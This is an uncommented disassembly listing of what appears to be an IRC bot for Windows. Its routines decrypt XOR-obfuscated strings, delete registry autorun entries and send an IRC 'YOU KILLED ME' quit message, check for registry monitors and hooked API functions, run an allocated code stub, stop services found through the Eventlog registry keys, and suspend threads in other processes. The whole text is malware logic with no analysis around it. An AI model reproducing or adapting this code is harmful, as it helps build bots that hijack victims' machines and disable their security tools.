; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_419477 proc near ; CODE XREF: .kSjx934:0041BAEA�p
; .kSjx934:0041C066�p
var_2A8 = byte ptr -2A8h
var_2A0 = dword ptr -2A0h
var_29C = dword ptr -29Ch
var_298 = dword ptr -298h
var_294 = dword ptr -294h
var_290 = dword ptr -290h
var_28C = byte ptr -28Ch
var_28B = byte ptr -28Bh
var_1CC = byte ptr -1CCh
var_1CB = byte ptr -1CBh
var_CC = byte ptr -0CCh
var_CB = byte ptr -0CBh
var_8 = dword ptr -8
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 2A8h
mov eax, ds:dword_423064
xor eax, ebp
mov [ebp+var_8], eax
mov eax, [ebp+arg_0]
push ebx
push esi
push edi
mov esi, 0BFh
xor ebx, ebx
push esi
mov [ebp+var_298], eax
lea eax, [ebp+var_CB]
push ebx
push eax
mov [ebp+var_CC], bl
call sub_407B70
add esp, 0Ch
push esi
lea eax, [ebp+var_28B]
push ebx
push eax
mov [ebp+var_28C], bl
call sub_407B70
add esp, 0Ch
push ebx
lea edi, [ebp+var_CC]
call sub_41B7F9
pop ecx
inc esi
push esi
mov eax, edi
push ebx
push eax
call sub_407B70
add esp, 0Ch
push esi
lea eax, [ebp+var_28C]
push ebx
push eax
call sub_407B70
add esp, 0Ch
push 0FFh
lea eax, [ebp+var_1CB]
push ebx
push eax
mov [ebp+var_1CC], bl
call sub_407B70
mov eax, ds:dword_433C4C
mov eax, [eax]
mov [ebp+var_290], eax
mov eax, offset dword_433C48
add esp, 0Ch
mov [ebp+var_294], eax
mov [ebp+var_2A0], eax
loc_419530: ; CODE XREF: sub_419477+102�j
mov eax, ds:dword_433C4C
lea edi, [ebp+var_2A0]
lea esi, [ebp+var_294]
mov [ebp+var_29C], eax
call sub_40166F
test al, al
jz short loc_419587
mov edi, offset aRegistryMonito ; "Registry Monitor"
call sub_40164F
mov esi, eax
add esi, 5
push 11h
pop ecx
xor eax, eax
repe cmpsb
lea esi, [ebp+var_294]
jz short loc_41957B
lea edi, [ebp+var_2A8]
call sub_40168C
jmp short loc_419530
; ---------------------------------------------------------------------------
loc_41957B: ; CODE XREF: sub_419477+F5�j
call sub_40164F
mov eax, [eax]
call sub_414023
loc_419587: ; CODE XREF: sub_419477+D7�j
mov edi, 100h
push edi
lea esi, [ebp+var_1CC]
mov ebx, offset byte_425119
call sub_4196D1
pop ecx
mov eax, esi
push eax
push offset aSoftwareMicr_1 ; "SOFTWARE\\Microsoft\\Windows\\CurrentVersi"...
push 80000002h
call sub_416F32
add esp, 0Ch
push edi
mov eax, esi
push 0
push eax
call sub_407B70
add esp, 0Ch
call sub_4190BD
push [ebp+var_298]
mov edi, offset dword_4269BC
push offset aQuitSYouKilled ; "QUIT :%s YOU KILLED ME :< --UPDATED\r\n"
call sub_4172CC
pop ecx
pop ecx
push 0
call ds:dword_41D050
int 3 ; Trap to Debugger
jmp ds:dword_41D090
sub_419477 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4195EC proc near ; CODE XREF: .kSjx934:loc_41BC29�p
var_18 = byte ptr -18h
var_13 = byte ptr -13h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_4 = dword ptr -4
push ebp
mov ebp, esp
sub esp, 18h
mov eax, ds:dword_423064
xor eax, ebp
mov [ebp+var_4], eax
push ebx
push esi
push edi
call ds:dword_41D0CC
mov esi, offset dword_420700
lea edi, [ebp+var_10]
movsd
movsd
push 40h
push 3000h
movsb
push 6
mov ebx, eax
xor edi, edi
push edi
lea eax, [ebp+var_18]
push ebx
mov [ebp+var_10+3], eax
call ds:dword_41D0C0
mov esi, eax
cmp esi, edi
jnz short loc_419635
loc_419631: ; CODE XREF: sub_4195EC+58�j
xor al, al
jmp short loc_419668
; ---------------------------------------------------------------------------
loc_419635: ; CODE XREF: sub_4195EC+43�j
push edi
push 40h
push 6
push esi
push ebx
call ds:dword_41D0C4
test eax, eax
jnz short loc_419631
mov eax, [ebp+var_10]
mov [esi], eax
mov eax, [ebp+var_C]
mov [esi+4], eax
call esi
push 8000h
push edi
push esi
push ebx
call ds:dword_41D0C8
cmp [ebp+var_13], 0D0h
setnbe al
loc_419668: ; CODE XREF: sub_4195EC+47�j
mov ecx, [ebp+var_4]
pop edi
pop esi
xor ecx, ebp
pop ebx
call sub_402710
leave
retn
sub_4195EC endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_419677 proc near ; CODE XREF: .kSjx934:0041BC07�p
var_C = byte ptr -0Ch
var_B = byte ptr -0Bh
var_A = byte ptr -0Ah
var_9 = byte ptr -9
var_8 = byte ptr -8
var_4 = dword ptr -4
push ebp
mov ebp, esp
sub esp, 0Ch
mov eax, ds:dword_423064
xor eax, ebp
mov [ebp+var_4], eax
push esi
push edi
push offset aMessageboxa_0 ; "MessageBoxA"
push offset aUser32_dll ; "user32.dll"
mov [ebp+var_C], 55h
mov [ebp+var_B], 8Bh
mov [ebp+var_A], 0ECh
mov [ebp+var_9], 81h
mov [ebp+var_8], 0ECh
call ds:dword_41D0E8
push eax
call ds:dword_41D0EC
push 5
mov esi, eax
pop ecx
xor eax, eax
lea edi, [ebp+var_C]
repe cmpsb
mov ecx, [ebp+var_4]
setz al
pop edi
xor ecx, ebp
pop esi
call sub_402710
leave
retn
sub_419677 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4196D1 proc near ; CODE XREF: sub_40177B+81�p
; sub_4019F3+81�p ...
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ecx
push edi
push [ebp+arg_0]
xor edi, edi
push edi
push esi
call sub_407B70
mov eax, ebx
add esp, 0Ch
lea ecx, [eax+1]
loc_4196EA: ; CODE XREF: sub_4196D1+1E�j
mov dl, [eax]
inc eax
test dl, dl
jnz short loc_4196EA
sub eax, ecx
jz short loc_41975B
mov eax, [ebp+arg_0]
dec eax
mov [ebp+var_4], eax
loc_4196FC: ; CODE XREF: sub_4196D1+88�j
mov eax, offset aHjdxzopvuvmrjf ; "hJdXZOPvUVmRJfVS"
lea edx, [eax+1]
loc_419704: ; CODE XREF: sub_4196D1+38�j
mov cl, [eax]
inc eax
test cl, cl
jnz short loc_419704
sub eax, edx
jz short loc_419711
xor eax, eax
loc_419711: ; CODE XREF: sub_4196D1+3C�j
movsx ecx, byte ptr [edi+ebx]
movsx eax, byte ptr ds:aHjdxzopvuvmrjf[eax] ; "hJdXZOPvUVmRJfVS"
xor ecx, eax
xor ecx, 0FDh
push ecx
push esi
push offset dword_42072C
push [ebp+var_4]
push esi
call sub_402AEE
mov eax, esi
add esp, 14h
lea ecx, [eax+1]
loc_41973C: ; CODE XREF: sub_4196D1+70�j
mov dl, [eax]
inc eax
test dl, dl
jnz short loc_41973C
sub eax, ecx
mov [eax+esi], dl
mov eax, ebx
inc edi
lea ecx, [eax+1]
loc_41974E: ; CODE XREF: sub_4196D1+82�j
mov dl, [eax]
inc eax
test dl, dl
jnz short loc_41974E
sub eax, ecx
cmp edi, eax
jb short loc_4196FC
loc_41975B: ; CODE XREF: sub_4196D1+22�j
mov eax, esi
pop edi
leave
retn
sub_4196D1 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_419760 proc near ; CODE XREF: sub_419C1D+28�p
var_3C = byte ptr -3Ch
var_38 = dword ptr -38h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = byte ptr -1Ch
ms_exc = CPPEH_RECORD ptr -18h
push 2Ch
push offset dword_4219D0
call __SEH_prolog4
mov edi, ds:dword_41D108
call edi
mov [ebp+var_20], eax
lea eax, [ebp+var_1C]
push eax
push 24h
lea eax, [ebp+var_3C]
push eax
push 0
push ebx
mov esi, ds:dword_41D028
call esi
test eax, eax
jnz short loc_41979B
loc_419790: ; CODE XREF: sub_419760+61�j
; sub_419760+8A�j ...
call ds:dword_41D0F0
jmp loc_41982F
; ---------------------------------------------------------------------------
loc_41979B: ; CODE XREF: sub_419760+2E�j
cmp [ebp+var_38], 1
jz loc_41982D
jmp short loc_4197D5
; ---------------------------------------------------------------------------
loc_4197A7: ; CODE XREF: sub_419760+79�j
push [ebp+var_24]
call ds:dword_41D0FC
lea eax, [ebp+var_1C]
push eax
push 24h
lea eax, [ebp+var_3C]
push eax
push 0
push ebx
call esi
test eax, eax
jz short loc_419790
cmp [ebp+var_38], 1
jz short loc_41982D
call edi
sub eax, [ebp+var_20]
cmp eax, 12Ch
ja short loc_4197EE
loc_4197D5: ; CODE XREF: sub_419760+45�j
cmp [ebp+var_38], 3
jz short loc_4197A7
lea eax, [ebp+var_3C]
push eax
push 1
push ebx
call ds:dword_41D01C
test eax, eax
jz short loc_419790
jmp short loc_419827
; ---------------------------------------------------------------------------
loc_4197EE: ; CODE XREF: sub_419760+73�j
; sub_419760+C5�j
mov eax, 5B4h
jmp short loc_41982F
; ---------------------------------------------------------------------------
loc_4197F5: ; CODE XREF: sub_419760+CB�j
push [ebp+var_24]
call ds:dword_41D0FC
lea eax, [ebp+var_1C]
push eax
push 24h
lea eax, [ebp+var_3C]
push eax
push 0
push ebx
call esi
test eax, eax
jz loc_419790
cmp [ebp+var_38], 1
jz short loc_41982D
call edi
sub eax, [ebp+var_20]
cmp eax, 12Ch
ja short loc_4197EE
loc_419827: ; CODE XREF: sub_419760+8C�j
cmp [ebp+var_38], 1
jnz short loc_4197F5
loc_41982D: ; CODE XREF: sub_419760+3F�j
; sub_419760+67�j ...
xor eax, eax
loc_41982F: ; CODE XREF: sub_419760+36�j
; sub_419760+93�j
call __SEH_epilog4
retn
sub_419760 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_419835 proc near ; CODE XREF: sub_419EA0+2C7�p
; sub_419EA0+36E�p
var_30 = dword ptr -30h
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 30h
push ebx
push esi
push edi
push 10h
pop esi
lea eax, [ebp+var_10]
push eax
push [ebp+arg_4]
xor edi, edi
push edi
mov [ebp+var_8], esi
call ds:dword_41D034
test eax, eax
jnz short loc_41985C
loc_419858: ; CODE XREF: sub_419835+5F�j
xor al, al
jmp short loc_4198CD
; ---------------------------------------------------------------------------
loc_41985C: ; CODE XREF: sub_419835+21�j
mov eax, [ebp+var_10]
mov [ebp+var_2C], eax
mov eax, [ebp+var_C]
mov [ebp+var_28], eax
lea eax, [ebp+var_8]
push eax
lea eax, [ebp+var_20]
push eax
push esi
mov esi, ds:dword_41D014
lea eax, [ebp+var_30]
push eax
push edi
push [ebp+arg_0]
xor ebx, ebx
inc ebx
mov [ebp+var_30], ebx
mov [ebp+var_24], edi
call esi
mov edi, ds:dword_41D0F0
call edi
test eax, eax
jnz short loc_419858
mov eax, [ebp+var_10]
mov [ebp+var_1C], eax
mov eax, [ebp+var_C]
mov [ebp+var_18], eax
xor eax, eax
cmp [ebp+arg_8], eax
mov [ebp+var_20], ebx
jz short loc_4198B2
or [ebp+var_14], 2
jmp short loc_4198B6
; ---------------------------------------------------------------------------
loc_4198B2: ; CODE XREF: sub_419835+75�j
and [ebp+var_14], 0FFFFFFFDh
loc_4198B6: ; CODE XREF: sub_419835+7B�j
push eax
push eax
push [ebp+var_8]
lea ecx, [ebp+var_20]
push ecx
push eax
push [ebp+arg_0]
call esi
call edi
neg eax
sbb al, al
inc al
loc_4198CD: ; CODE XREF: sub_419835+25�j
pop edi
pop esi
pop ebx
leave
retn
sub_419835 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4198D2 proc near ; CODE XREF: sub_419EA0+400�p
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
push ecx
push ecx
push ebx
push esi
push edi
lea eax, [ebp+var_8]
push eax
push [ebp+arg_8]
xor ebx, ebx
push [ebp+arg_C]
mov [ebp+var_8], ebx
push [ebp+arg_4]
push [ebp+arg_0]
call ds:dword_426570
test eax, eax
jnz short loc_419909
loc_4198F9: ; CODE XREF: sub_4198D2+70�j
; sub_4198D2+74�j
push [ebp+arg_C]
call sub_402B9B
pop ecx
pop edi
pop esi
mov al, bl
pop ebx
leave
retn
; ---------------------------------------------------------------------------
loc_419909: ; CODE XREF: sub_4198D2+25�j
xor eax, eax
loc_41990B: ; CODE XREF: sub_4198D2+6C�j
and [ebp+var_4], 0
mov edx, offset dword_4255E8
loc_419914: ; CODE XREF: sub_4198D2+66�j
mov esi, [ebp+arg_C]
mov ecx, [edx+80h]
add esi, eax
mov edi, edx
xor ebx, ebx
repe cmpsb
jz short loc_419944
mov ecx, 84h
add [ebp+var_4], ecx
add edx, ecx
cmp [ebp+var_4], 318h
jb short loc_419914
inc eax
cmp eax, [ebp+var_8]
jbe short loc_41990B
xor bl, bl
jmp short loc_4198F9
; ---------------------------------------------------------------------------
loc_419944: ; CODE XREF: sub_4198D2+53�j
mov bl, 1
jmp short loc_4198F9
sub_4198D2 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_419948 proc near ; CODE XREF: sub_419EA0+483�p
var_1C = dword ptr -1Ch
var_14 = dword ptr -14h
var_10 = dword ptr -10h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 1Ch
lea eax, [ebp+var_1C]
push eax
push [ebp+arg_4]
mov [ebp+var_1C], 1Ch
call ds:dword_42656C
test eax, eax
jnz short loc_41996A
xor al, al
leave
retn
; ---------------------------------------------------------------------------
loc_41996A: ; CODE XREF: sub_419948+1C�j
; sub_419948+55�j
mov eax, [ebp+var_10]
cmp eax, [ebp+arg_0]
jnz short loc_41998E
push [ebp+var_14]
push 0
push 1F03FFh
call ds:dword_426580
push eax
call ds:dword_41D0D4
cmp eax, 0FFFFFFFFh
jz short loc_41999F
loc_41998E: ; CODE XREF: sub_419948+28�j
lea eax, [ebp+var_1C]
push eax
push [ebp+arg_4]
call ds:dword_426590
test eax, eax
jnz short loc_41996A
loc_41999F: ; CODE XREF: sub_419948+44�j
push [ebp+arg_4]
call ds:dword_41D0DC
mov al, 1
leave
retn
sub_419948 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4199AC proc near ; CODE XREF: sub_419EA0+3BD�p
var_1C = dword ptr -1Ch
var_14 = dword ptr -14h
var_10 = dword ptr -10h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 1Ch
lea eax, [ebp+var_1C]
push eax
push [ebp+arg_4]
mov [ebp+var_1C], 1Ch
call ds:dword_42656C
test eax, eax
jnz short loc_4199CE
xor al, al
leave
retn
; ---------------------------------------------------------------------------
loc_4199CE: ; CODE XREF: sub_4199AC+1C�j
; sub_4199AC+55�j
mov eax, [ebp+var_10]
cmp eax, [ebp+arg_0]
jnz short loc_4199F2
push [ebp+var_14]
push 0
push 1F03FFh
call ds:dword_426580
push eax
call ds:dword_41D0D8
cmp eax, 0FFFFFFFFh
jz short loc_419A03
loc_4199F2: ; CODE XREF: sub_4199AC+28�j
lea eax, [ebp+var_1C]
push eax
push [ebp+arg_4]
call ds:dword_426590
test eax, eax
jnz short loc_4199CE
loc_419A03: ; CODE XREF: sub_4199AC+44�j
push [ebp+arg_4]
call ds:dword_41D0DC
mov al, 1
leave
retn
sub_4199AC endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_419A10 proc near ; CODE XREF: sub_419EA0+3D4�p
var_228 = dword ptr -228h
var_214 = dword ptr -214h
var_210 = dword ptr -210h
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 228h
mov eax, ds:dword_423064
xor eax, ebp
mov [ebp+var_4], eax
push ebx
push edi
push [ebp+arg_0]
xor ebx, ebx
push 8
call ds:dword_426574
mov edi, eax
cmp edi, 0FFFFFFFFh
jnz short loc_419A49
loc_419A39: ; CODE XREF: sub_419A10+53�j
xor al, al
loc_419A3B: ; CODE XREF: sub_419A10+8D�j
mov ecx, [ebp+var_4]
pop edi
xor ecx, ebp
pop ebx
call sub_402710
leave
retn
; ---------------------------------------------------------------------------
loc_419A49: ; CODE XREF: sub_419A10+27�j
lea eax, [ebp+var_228]
push eax
push edi
mov [ebp+var_228], 224h
call ds:dword_426568
test eax, eax
jz short loc_419A39
loc_419A65: ; CODE XREF: sub_419A10+6B�j
inc ebx
cmp ebx, 1
jz short loc_419A81
lea eax, [ebp+var_228]
push eax
push edi
call ds:dword_426584
test eax, eax
jnz short loc_419A65
xor bl, bl
jmp short loc_419A94
; ---------------------------------------------------------------------------
loc_419A81: ; CODE XREF: sub_419A10+59�j
mov eax, [ebp+var_214]
mov [esi], eax
mov eax, [ebp+var_210]
mov [esi+4], eax
mov bl, 1
loc_419A94: ; CODE XREF: sub_419A10+6F�j
push edi
call ds:dword_41D0DC
mov al, bl
jmp short loc_419A3B
sub_419A10 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame fpd=1B4h
sub_419A9F proc near ; CODE XREF: sub_419E55+2D�p
var_234 = dword ptr -234h
var_230 = dword ptr -230h
var_22C = dword ptr -22Ch
var_228 = dword ptr -228h
var_224 = dword ptr -224h
var_220 = dword ptr -220h
var_21C = dword ptr -21Ch
var_218 = dword ptr -218h
var_214 = dword ptr -214h
var_210 = dword ptr -210h
var_20C = dword ptr -20Ch
var_208 = dword ptr -208h
var_204 = byte ptr -204h
var_104 = byte ptr -104h
var_103 = byte ptr -103h
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
lea ebp, [esp-1B4h]
sub esp, 234h
mov eax, ds:dword_423064
xor eax, ebp
mov [ebp+1B4h+var_4], eax
mov eax, [ebp+1B4h+arg_0]
push ebx
push esi
push edi
xor ebx, ebx
push 0FFh
mov [ebp+1B4h+var_224], eax
lea eax, [ebp+1B4h+var_103]
push ebx
push eax
mov [ebp+1B4h+var_234], offset aSoftwareMicr_2 ; "SOFTWARE\\Microsoft\\Windows\\CurrentVersi"...
mov [ebp+1B4h+var_230], offset aSoftwareMicr_3 ; "SOFTWARE\\Microsoft\\Windows\\CurrentVersi"...
mov [ebp+1B4h+var_22C], offset aSoftwareMicr_4 ; "SOFTWARE\\Microsoft\\Windows\\CurrentVersi"...
mov [ebp+1B4h+var_228], offset aSoftwareMicr_5 ; "SOFTWARE\\Microsoft\\Windows\\CurrentVersi"...
mov [ebp+1B4h+var_104], bl
call sub_407B70
mov esi, 100h
add esp, 0Ch
mov [ebp+1B4h+var_21C], esi
mov [ebp+1B4h+var_214], esi
mov [ebp+1B4h+var_20C], offset dword_4255DC
mov [ebp+1B4h+var_220], 2
loc_419B18: ; CODE XREF: sub_419A9F+160�j
mov [ebp+1B4h+var_208], ebx
loc_419B1B: ; CODE XREF: sub_419A9F+153�j
mov eax, [ebp+1B4h+var_208]
mov eax, [ebp+eax*4+1B4h+var_234]
lea ecx, [ebp+1B4h+var_210]
push ecx
push 1
push ebx
push eax
mov eax, [ebp+1B4h+var_20C]
push dword ptr [eax]
call ds:dword_41D02C
test eax, eax
jnz loc_419BE2
lea eax, [ebp+1B4h+var_214]
push eax
lea eax, [ebp+1B4h+var_204]
push eax
push ebx
push ebx
lea eax, [ebp+1B4h+var_21C]
push eax
lea eax, [ebp+1B4h+var_104]
push eax
mov [ebp+1B4h+var_218], ebx
push ebx
jmp short loc_419BCE
; ---------------------------------------------------------------------------
loc_419B58: ; CODE XREF: sub_419A9F+13D�j
xor edi, edi
loc_419B5A: ; CODE XREF: sub_419A9F+10C�j
mov eax, [ebp+1B4h+var_224]
lea edx, [eax+1]
loc_419B60: ; CODE XREF: sub_419A9F+C6�j
mov cl, [eax]
inc eax
cmp cl, bl
jnz short loc_419B60
sub eax, edx
push eax
push [ebp+1B4h+var_224]
lea eax, [ebp+edi+1B4h+var_204]
push eax
call sub_4029E9
add esp, 0Ch
test eax, eax
jnz short loc_419B99
lea eax, [ebp+1B4h+var_104]
push eax
mov eax, [ebp+1B4h+var_208]
push [ebp+eax*4+1B4h+var_234]
mov eax, [ebp+1B4h+var_20C]
push dword ptr [eax]
call sub_416F32
add esp, 0Ch
loc_419B99: ; CODE XREF: sub_419A9F+DD�j
lea eax, [ebp+1B4h+var_204]
inc edi
lea edx, [eax+1]
loc_419BA0: ; CODE XREF: sub_419A9F+106�j
mov cl, [eax]
inc eax
cmp cl, bl
jnz short loc_419BA0
sub eax, edx
cmp edi, eax
jbe short loc_419B5A
inc [ebp+1B4h+var_218]
lea eax, [ebp+1B4h+var_214]
push eax
lea eax, [ebp+1B4h+var_204]
push eax
push ebx
push ebx
lea eax, [ebp+1B4h+var_21C]
push eax
lea eax, [ebp+1B4h+var_104]
push eax
push [ebp+1B4h+var_218]
mov [ebp+1B4h+var_21C], esi
mov [ebp+1B4h+var_214], esi
loc_419BCE: ; CODE XREF: sub_419A9F+B7�j
push [ebp+1B4h+var_210]
call ds:dword_41D020
cmp eax, 103h
jnz loc_419B58
loc_419BE2: ; CODE XREF: sub_419A9F+98�j
push [ebp+1B4h+var_210]
call ds:dword_41D010
inc [ebp+1B4h+var_208]
cmp [ebp+1B4h+var_208], 4
jb loc_419B1B
add [ebp+1B4h+var_20C], 4
dec [ebp+1B4h+var_220]
jnz loc_419B18
mov ecx, [ebp+1B4h+var_4]
pop edi
pop esi
xor ecx, ebp
pop ebx
call sub_402710
add ebp, 1B4h
leave
retn
sub_419A9F endp
; =============== S U B R O U T I N E =======================================
sub_419C1D proc near ; CODE XREF: sub_419C6D+189�p
arg_0 = dword ptr 4
push ebx
push esi
push edi
push 0F003Fh
push 0
push 0
call ds:dword_41D024
push 0F01FFh
push [esp+10h+arg_0]
mov esi, eax
push esi
call ds:dword_41D044
mov edi, eax
mov ebx, edi
call sub_419760
push edi
call ds:dword_41D03C
test eax, eax
jz short loc_419C69
mov bl, 1
loc_419C57: ; CODE XREF: sub_419C1D+4E�j
push esi
mov esi, ds:dword_41D040
call esi
push edi
call esi
pop edi
pop esi
mov al, bl
pop ebx
retn
; ---------------------------------------------------------------------------
loc_419C69: ; CODE XREF: sub_419C1D+36�j
xor bl, bl
jmp short loc_419C57
sub_419C1D endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame fpd=2C0h
sub_419C6D proc near ; CODE XREF: sub_419E55+35�p
; sub_419E55:loc_419E92�p
var_340 = dword ptr -340h
var_33C = dword ptr -33Ch
var_338 = dword ptr -338h
var_334 = byte ptr -334h
var_234 = byte ptr -234h
var_233 = byte ptr -233h
var_134 = byte ptr -134h
var_133 = byte ptr -133h
var_34 = byte ptr -34h
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
lea ebp, [esp-2C0h]
sub esp, 340h
mov eax, ds:dword_423064
xor eax, ebp
mov [ebp+2C0h+var_4], eax
push esi
mov eax, [ebp+2C0h+arg_0]
push edi
push 0Bh
pop ecx
mov esi, offset aSystemControls ; "SYSTEM\\ControlSet001\\Services\\Eventlog\\"...
lea edi, [ebp+2C0h+var_34]
rep movsd
movsw
mov esi, 0FFh
push esi
mov [ebp+2C0h+var_340], eax
xor edi, edi
lea eax, [ebp+2C0h+var_233]
push edi
push eax
mov [ebp+2C0h+var_234], 0
call sub_407B70
push esi
lea eax, [ebp+2C0h+var_133]
push edi
push eax
mov [ebp+2C0h+var_134], 0
call sub_407B70
add esp, 18h
lea eax, [ebp+2C0h+var_33C]
push eax
push 0F003Fh
push edi
lea eax, [ebp+2C0h+var_34]
push eax
push 80000002h
call ds:dword_41D02C
test eax, eax
jnz loc_419E35
push ebx
mov ebx, 100h
push ebx
lea eax, [ebp+2C0h+var_134]
push eax
push edi
push [ebp+2C0h+var_33C]
mov [ebp+2C0h+var_338], edi
call ds:dword_41D018
cmp eax, 103h
jz loc_419E34
jmp short loc_419D2A
; ---------------------------------------------------------------------------
loc_419D25: ; CODE XREF: sub_419C6D+1C1�j
mov esi, 0FFh
loc_419D2A: ; CODE XREF: sub_419C6D+B6�j
push ebx
lea eax, [ebp+2C0h+var_334]
push edi
push eax
call sub_407B70
push ebx
lea eax, [ebp+2C0h+var_234]
push edi
push eax
call sub_407B70
lea eax, [ebp+2C0h+var_134]
push eax
lea eax, [ebp+2C0h+var_34]
push eax
push offset aSS_1 ; "%s\\%s"
lea eax, [ebp+2C0h+var_234]
push esi
push eax
call sub_402AEE
lea eax, [ebp+2C0h+var_234]
add esp, 2Ch
lea esi, [eax+1]
loc_419D6F: ; CODE XREF: sub_419C6D+107�j
mov cl, [eax]
inc eax
test cl, cl
jnz short loc_419D6F
sub eax, esi
mov [ebp+eax+2C0h+var_234], cl
lea eax, [ebp+2C0h+var_134]
push offset aLdm ; "LDM"
push eax
call sub_4028A9
test eax, eax
pop ecx
pop ecx
jz short loc_419E12
push 7
mov edi, offset aNetdde ; "NetDDE"
lea esi, [ebp+2C0h+var_134]
pop ecx
xor eax, eax
repe cmpsb
jz short loc_419E10
push ebx
lea eax, [ebp+2C0h+var_334]
push eax
push offset aEventmessagefi ; "EventMessageFile"
lea eax, [ebp+2C0h+var_234]
push eax
push 1
call sub_416ECD
add esp, 14h
test al, al
jz short loc_419E10
xor esi, esi
loc_419DCB: ; CODE XREF: sub_419C6D+1A1�j
mov eax, [ebp+2C0h+var_340]
lea edx, [eax+1]
loc_419DD1: ; CODE XREF: sub_419C6D+169�j
mov cl, [eax]
inc eax
test cl, cl
jnz short loc_419DD1
sub eax, edx
push eax
push [ebp+2C0h+var_340]
lea eax, [ebp+esi+2C0h+var_334]
push eax
call sub_4029E9
add esp, 0Ch
test eax, eax
jnz short loc_419DFC
lea eax, [ebp+2C0h+var_134]
push eax
call sub_419C1D
pop ecx
loc_419DFC: ; CODE XREF: sub_419C6D+180�j
lea eax, [ebp+2C0h+var_334]
inc esi
lea edx, [eax+1]
loc_419E03: ; CODE XREF: sub_419C6D+19B�j
mov cl, [eax]
inc eax
test cl, cl
jnz short loc_419E03
sub eax, edx
cmp esi, eax
jbe short loc_419DCB
loc_419E10: ; CODE XREF: sub_419C6D+13B�j
; sub_419C6D+15A�j
xor edi, edi
loc_419E12: ; CODE XREF: sub_419C6D+127�j
inc [ebp+2C0h+var_338]
push ebx
lea eax, [ebp+2C0h+var_134]
push eax
push [ebp+2C0h+var_338]
push [ebp+2C0h+var_33C]
call ds:dword_41D018
cmp eax, 103h
jnz loc_419D25
loc_419E34: ; CODE XREF: sub_419C6D+B0�j
pop ebx
loc_419E35: ; CODE XREF: sub_419C6D+8A�j
push [ebp+2C0h+var_33C]
call ds:dword_41D010
mov ecx, [ebp+2C0h+var_4]
pop edi
xor ecx, ebp
pop esi
call sub_402710
add ebp, 2C0h
leave
retn
sub_419C6D endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_419E55 proc near ; CODE XREF: sub_419EA0+42A�p
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
push 0FFFFFFFFh
push [ebp+arg_0]
call ds:dword_41D0F8
test eax, eax
jz short loc_419E9C
push 7D0h
call ds:dword_41D0FC
push [ebp+arg_4]
call ds:dword_41D0D0
test eax, eax
push [ebp+arg_8]
jz short loc_419E92
call sub_419A9F
push [ebp+arg_8]
call sub_419C6D
pop ecx
jmp short loc_419E97
; ---------------------------------------------------------------------------
loc_419E92: ; CODE XREF: sub_419E55+2B�j
call sub_419C6D
loc_419E97: ; CODE XREF: sub_419E55+3B�j
pop ecx
mov al, 1
pop ebp
retn
; ---------------------------------------------------------------------------
loc_419E9C: ; CODE XREF: sub_419E55+10�j
xor al, al
pop ebp
retn
sub_419E55 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_419EA0 proc near ; DATA XREF: .kSjx934:0041BF57�o
var_569 = byte ptr -569h
var_568 = dword ptr -568h
var_564 = dword ptr -564h
var_560 = dword ptr -560h
var_55C = dword ptr -55Ch
var_558 = dword ptr -558h
var_554 = dword ptr -554h
var_550 = dword ptr -550h
var_54C = dword ptr -54Ch
var_548 = dword ptr -548h
var_540 = dword ptr -540h
var_524 = byte ptr -524h
var_420 = byte ptr -420h
var_318 = byte ptr -318h
var_317 = byte ptr -317h
var_210 = byte ptr -210h
var_4 = dword ptr -4
push ebp
mov ebp, esp
and esp, 0FFFFFFF8h
sub esp, 56Ch
mov eax, ds:dword_423064
xor eax, esp
mov [esp+56Ch+var_4], eax
push ebx
push esi
push edi
xor ebx, ebx
push 103h
lea eax, [esp+57Ch+var_317]
push ebx
push eax
mov [esp+584h+var_318], bl
call sub_407B70
add esp, 0Ch
mov [esp+578h+var_558], offset dword_420744
mov [esp+578h+var_554], offset dword_420754
mov [esp+578h+var_550], offset dword_420760
call sub_402AE8
mov edi, ds:dword_41D0E4
push offset aOpenthread ; "OpenThread"
push offset aKernel32_dll_0 ; "kernel32.dll"
mov [esp+580h+var_54C], eax
call edi
mov esi, ds:dword_41D0EC
push eax
call esi
push offset aOpenprocess ; "OpenProcess"
push offset aKernel32_dll_1 ; "kernel32.dll"
mov ds:dword_426580, eax
call edi
push eax
call esi
push offset aCreatetoolhelp ; "CreateToolhelp32Snapshot"
push offset aKernel32_dll_2 ; "kernel32.dll"
mov ds:dword_42658C, eax
call edi
push eax
call esi
push offset aProcess32first ; "Process32First"
